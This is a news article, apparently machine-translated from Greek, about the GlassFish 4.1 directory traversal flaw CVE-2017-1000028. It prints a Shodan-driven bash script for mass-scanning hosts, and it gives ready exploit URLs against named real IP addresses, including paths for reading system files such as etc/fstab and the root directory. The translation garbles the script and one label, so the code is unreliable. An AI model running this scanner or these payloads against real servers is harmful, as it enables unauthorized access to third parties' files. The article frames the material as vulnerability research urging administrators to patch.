Thursday, April 9, 21:25
Home investigations GlassFish Oracle: Vulnerability Exposes Data to Thousands of Servers Worldwide (Analysis)

GlassFish Oracle: Vulnerability Exposes Data to Thousands of Servers Worldwide (Analysis)

GlassFish Oracle Vulnerability: Security researcher Dimitris Roussis analyzes us as a vulnerability to the known Application Server Its GlassFish Oracle recognized as CVE-2017-1000028 (https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1000028) currently exposes data to thousands of servers worldwide.

Oracle GlassFish

Its exploitation security vacuum allows to read through the Directory Traversal Attack type of all server files on which the Application Server is installed.

In the analysis carried out by the researcher, 300 servers are first used as a sample through the shodan search engine that has GlashFish installed on the 4.1 version.

Then, through an automated script created by the researcher, they check which of the servers actually exists. vulnerability.

- Advertisement -
#! / bin / bash # Get 300 Results From shodan search engine shodan search --limit 300 --fields ip_str GlassFish 4.1 port: 4848> servers_ip.txt # Sort IP cat servers_ip.txt | sort -n -t. -k 1,1 -k 2,2 -k 3,3 -k 4,4> servers_sort.txt # Remove All Whitespace sed -r 's / \ s + // g' servers_sort.txt> servers.txt # Delete Temporary Files rm servers_ip.txt rm servers_sort. txt # Server List input = "servers.txt" # check Server for vulnerability while IFS = read -r line do ip = $ line # http: //server_ip/theme/META-INF/../../ .. /../../../../../../../ url = "http: // $ line: 4848 / theme / META-INF /% c0% ae% c0% ae% c0 % af% c0% ae% c0% ae% c0% af% c0% ae% c0% ae% c0% ae% c0% ae% c0% ae% c0% ae% c0% ae% c0% ae% c0% ae % c0% ae% c0% ae% c0% ae% c0% ae% c0% ae% c0% ae% c0% ae% c0% ae% c0% ae% c0% ae% c0% ae% c0% aX% c0% aX % ae% c0% ae% c0% af "echo -n" ip: $ line "fetch =` curl -s -o / dev / null --max-time 5 -w "% {http_code}" $ url`; if [$ fetch = 200] then echo "- Successful Connection! Server is vulnerable" #Save result in vulnerable_servers.txt echo "$ url" >> vulnerable_servers.txt else echo "- Connection Failed! Server is not vulnerable" fi done < "$ input"

Servers

The end result of the script is to create a file that contains links (urls) to exploit the vulnerability immediately.

Looking at the links included in the file browser we can see all the files in the / root of the Server.

Examples include:

Windows Server

http://52.25.200.71:4848/theme/META-INF/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af

Oracle GlassFish

Linux Server

http://87.98.212.108:4848/theme/META-INF/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af

GlassFish Oracle Servers

We can now access any file we want on the Server by adding the file path to the end of the url.

B.C.

/ Etc/ passwd

http://87.98.212.108:4848/theme/META-INF/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afetc/fstab

/ Root

http://87.98.212.108:4848/theme/META-INF/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afroot

The above study demonstrates, on the one hand, that a vulnerability can lead to the disclosure of large-scale data worldwide and the need for immediate implementation of the data. software updates by the System Administrators.

The SecNews editorial team sincerely thanks researcher Dimitrios Roussis for valid and timely information.

* Dimitris Roussis is a member of the Information Systems Security Laboratory of the University of the Aegean.

http://www.icsd.aegean.gr/group/members-data.php?group=L1&member=1652

LEAVE ANSWER

Please enter your comment!
Please enter your name here

LIVE NEWS

loopfs: Could it be the new Linux file system?

Linux supports several file systems, such as EXT4, F2FS, Btrfs and XFS. These systems are sufficient when ...

Research: Teenagers prefer iPhones to Samsung phones

According to research conducted every six months in order to record the habits of teenagers, young people do not choose Samsung phones ....

Bill Gates: Schools open in the fall and the economy collapses

Bill Gates believes schools will be able to open in the fall, he told Becky Quick on CNBC.

OTE Group Telecommunications Museum: Educational programs and entertainment activities from home for children aged 4-12 and the whole family

Educational programs and entertainment activities for children and families, in which they can participate from home, are offered by the Group's Telecommunications Museum ...

Microsoft: The April 2020 update for Office has been released

Microsoft released the non-security updates of April 2020 for Microsoft Office, which include corrections for errors as well as improvements ...

Tesla's new Cheetah mode offers top performance

The new Cheetah mode in the Tesla S model pushes the electric car from 0 to 100 km / h faster than ...

Tails 4.5: The new, safer version has been released!

Tails 4.5: The new, safer version has been released - Tails, is a live operating system based on ...

Windows 10 feature helps to delete useless files and apps

Windows 10 will make it easier to delete useless files and apps by displaying them in a list.

Cloudflare: Stops using Google's reCAPTCHA!

Cloudflare has announced that it will stop using Google's reCAPTCHA and switch to a new bot detector that ...

Google Stadia Pro is available for free for two months! Time for video games!

The situation we are experiencing lately due to corona, is one of the most difficult situations of ...